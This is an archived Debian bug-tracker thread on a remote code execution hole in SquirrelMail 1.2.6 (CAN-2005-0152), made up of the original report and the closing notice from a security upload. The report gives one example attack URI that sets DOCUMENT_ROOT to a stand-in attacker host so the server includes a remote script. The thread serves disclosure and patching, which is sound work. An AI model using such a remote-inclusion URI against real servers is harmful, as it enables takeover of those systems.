Bug#292714: marked as done ([CAN-2005-0152] Remote code execution as www-data when register_globals and allow_url_fopen are on)

Debian Bug Tracking System Tue, 01 Feb 2005 07:38:11 -0800

Your message dated Tue, 1 Feb 2005 16:16:15 +0100
with message-id <[EMAIL PROTECTED]>
and subject line [EMAIL PROTECTED]: Fixed in NMU of squirrelmail 1:1.2.6-2]
has caused the attached Bug report to be marked as done.


This means that you claim that the problem has been dealt with.
If this is not the case it is now your responsibility to reopen the
Bug report if necessary, and/or fix the problem forthwith.

(NB: If you are a system administrator and have no idea what I am
talking about this indicates a serious mail system misconfiguration
somewhere.  Please contact me immediately.)

Debian bug tracking system administrator
(administrator, Debian Bugs database)

--------------------------------------
Received: (at submit) by bugs.debian.org; 29 Jan 2005 00:17:33 +0000
>From [EMAIL PROTECTED] Fri Jan 28 16:17:33 2005
Return-path: <[EMAIL PROTECTED]>
Received: from antiflux.org (okcomputer.antiflux.org) [216.234.161.200] 
(postfix)
        by spohr.debian.org with esmtp (Exim 3.35 1 (Debian))
        id 1CugIv-0008AY-00; Fri, 28 Jan 2005 16:17:33 -0800
Received: from localhost (localhost [127.0.0.1])
        by okcomputer.antiflux.org (Postfix) with ESMTP id CCF4DC318
        for <[EMAIL PROTECTED]>; Fri, 28 Jan 2005 17:17:32 -0700 (MST)
Received: from okcomputer.antiflux.org ([127.0.0.1])
        by localhost (okcomputer.antiflux.org [127.0.0.1]) (amavisd-new, port 
10024)
        with ESMTP id 26304-01 for <[EMAIL PROTECTED]>;
        Fri, 28 Jan 2005 17:17:30 -0700 (MST)
Received: by okcomputer.antiflux.org (Postfix, from userid 1000)
        id 9C2EFC64F; Fri, 28 Jan 2005 17:17:30 -0700 (MST)
Date: Fri, 28 Jan 2005 17:17:30 -0700
From: Grant Hollingworth <[EMAIL PROTECTED]>
To: Debian Bug Tracking System <[EMAIL PROTECTED]>
Subject: squirrelmail: security hole - uri poisoning
Message-ID: <[EMAIL PROTECTED]>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
User-Agent: Mutt/1.3.28i
X-Reportbug-Version: 1.50
X-Virus-Scanned: by amavisd-new-20030616-p10 (Debian) at antiflux.org
Delivered-To: [EMAIL PROTECTED]
X-Spam-Checker-Version: SpamAssassin 2.60-bugs.debian.org_2005_01_02 
        (1.212-2003-09-23-exp) on spohr.debian.org
X-Spam-Status: No, hits=-8.0 required=4.0 tests=BAYES_00,HAS_PACKAGE 
        autolearn=no version=2.60-bugs.debian.org_2005_01_02
X-Spam-Level: 

Package: squirrelmail
Version: 1:1.2.6-1.4
Severity: grave
Justification: user security hole
Tags: security

An attacker can attach DOCUMENT_ROOT to a SquirrelMail URI (eg,
/src/redirect.php?DOCUMENT_ROOT=http://evil.example.com).  If
register_globals and allow_url_fopen are on (they are by default in the
stable php4) then functions/display_message.php will include the
attacker's script, allowing access as www-data.

There is a fix in version 1.48.2.1 of display_message.php:
http://cvs.sourceforge.net/viewcvs.py/squirrelmail/squirrelmail/functions/display_messages.php?r1=1.48&r2=1.48.2.1

-- System Information
Debian Release: 3.0
Architecture: i386
Kernel: Linux okcomputer 2.4.29 #1 SMP Thu Jan 20 20:41:12 MST 2005 i686
Locale: LANG=en_CA, LC_CTYPE=en_CA

Versions of packages squirrelmail depends on:
ii  apache                    1.3.26-0woody6 Versatile, high-performance HTTP s
ii  aspell                    0.33.7.1.1-9   A more intelligent replacement for
ii  debconf                   1.2.35         Debian configuration management sy
ii  ispell                    3.1.20-21.1    International Ispell (an interacti
ii  perl                      5.6.1-8.8      Larry Wall's Practical Extraction 
ii  php4                      4:4.1.2-7.0.1  A server-side, HTML-embedded scrip
ii  wwwconfig-common          0.0.19         Debian web auto configuration.

---------------------------------------
Received: (at 292714-done) by bugs.debian.org; 1 Feb 2005 15:16:16 +0000
>From [EMAIL PROTECTED] Tue Feb 01 07:16:16 2005
Return-path: <[EMAIL PROTECTED]>
Received: from a-eskwadraat.nl [131.211.34.218] 
        by spohr.debian.org with esmtp (Exim 3.35 1 (Debian))
        id 1CvzlI-0003wg-00; Tue, 01 Feb 2005 07:16:16 -0800
Received: from jeroen by A-Eskwadraat.nl with local (Exim 3.35 #1 (Debian))
        id 1CvzlH-0005JK-00
        for <[EMAIL PROTECTED]>; Tue, 01 Feb 2005 16:16:15 +0100
Date: Tue, 1 Feb 2005 16:16:15 +0100
To: [EMAIL PROTECTED]
Subject: [EMAIL PROTECTED]: Fixed in NMU of squirrelmail 1:1.2.6-2]
Message-ID: <[EMAIL PROTECTED]>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
User-Agent: Mutt/1.3.28i
From: Jeroen van Wolffelaar <[EMAIL PROTECTED]>
Delivered-To: [EMAIL PROTECTED]
X-Spam-Checker-Version: SpamAssassin 2.60-bugs.debian.org_2005_01_02 
        (1.212-2003-09-23-exp) on spohr.debian.org
X-Spam-Status: No, hits=-5.0 required=4.0 tests=BAYES_00,VALID_BTS_CONTROL 
        autolearn=no version=2.60-bugs.debian.org_2005_01_02
X-Spam-Level: 

This was a maintainer upload, katie's just mistaken because the woody
version doesn't yet list the new maintainers.

--Jeroen

----- Forwarded message from Thijs Kinkhorst <[EMAIL PROTECTED]> -----

From: Thijs Kinkhorst <[EMAIL PROTECTED]>
To: [EMAIL PROTECTED]
Cc: Thijs Kinkhorst <[EMAIL PROTECTED]>, Sam Johnston <[EMAIL PROTECTED]>
Subject: Fixed in NMU of squirrelmail 1:1.2.6-2
Date: Tue, 01 Feb 2005 10:02:37 -0500

tag 292714 + fixed

quit

This message was generated automatically in response to a
non-maintainer upload.  The .changes file follows.

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Format: 1.7
Date: Sun, 30 Jan 2005 18:27:25 +0100
Source: squirrelmail
Binary: squirrelmail
Architecture: source all
Version: 1:1.2.6-2
Distribution: stable-security
Urgency: high
Maintainer: Sam Johnston <[EMAIL PROTECTED]>
Changed-By: Thijs Kinkhorst <[EMAIL PROTECTED]>
Description: 
 squirrelmail - Webmail for nuts
Closes: 292714
Changes: 
 squirrelmail (1:1.2.6-2) stable-security; urgency=high
 .
   * Security upload
   * [CAN-2005-0152] Close security hole where URL-manipulation in combination
     with register_globals and allow_url_fopen both set to On could lead to
     remote code execution as the www-data user. (Closes: #292714).
     This issue is specific to exactly version 1.2.6 of SquirrelMail (older
     and newer versions not vulnerable). Thanks Grant Hollingworth for
     discovering this bug and notifying us about it.
   * [CAN-2005-0104] Fix possible XSS issues in src/webmail.php.
Files: 
 4900cffd3e5d45735f65c21476efc806 646 web optional squirrelmail_1.2.6-2.dsc
 4614ece547701e83d640b5740bb59d51 21204 web optional 
squirrelmail_1.2.6-2.diff.gz
 2d23a6986ab2862bb1acd160b5a2919c 1840668 web optional 
squirrelmail_1.2.6-2_all.deb

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.4 (GNU/Linux)
Comment: Signed by Jeroen van Wolffelaar <[EMAIL PROTECTED]>

iD8DBQFB/RpYl2uISwgTVp8RApKvAJsEYt+t9KjcusfFtDVgGOjLS5lVVACfV8OV
4Pr+HwmqkWlp1pEHefK8DrM=
=q3FH
-----END PGP SIGNATURE-----



----- End forwarded message -----

-- 
Jeroen van Wolffelaar
[EMAIL PROTECTED] (also for Jabber & MSN; ICQ: 33944357)
http://Jeroen.A-Eskwadraat.nl


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]

Bug#292714: marked as done ([CAN-2005-0152] Remote code execution as www-data when register_globals and allow_url_fopen are on)

Reply via email to